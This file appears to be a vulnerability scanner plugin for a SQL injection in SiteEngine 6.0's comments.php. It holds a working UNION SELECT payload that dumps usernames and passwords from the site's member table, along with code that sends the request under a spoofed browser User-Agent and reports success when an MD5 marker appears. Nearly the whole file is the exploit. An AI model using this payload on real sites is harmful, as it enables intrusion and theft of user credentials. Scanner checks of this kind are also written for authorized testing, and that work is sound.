#request url = var
#define payload = /comments.php?id=1&module=news+m,boka_newsclass+c+WhErE+1=2+UniOn+sElEct+1,2,Group_Concat(username,0x7e,password,0x7e,Md5(1234), 0x7e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+From+boka_members%23
#define bug = 81dc9bdb52d04dc20036dbd8313ed055
#define info = 存在SiteEngine6.0 comments.php SQL注入漏洞

function main(args)
{
	res = HttpGet(url.payload,"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0");
	if(StrFindStr(res[0],bug,0)!= "-1")
	{
		print(url.info);
	}
}
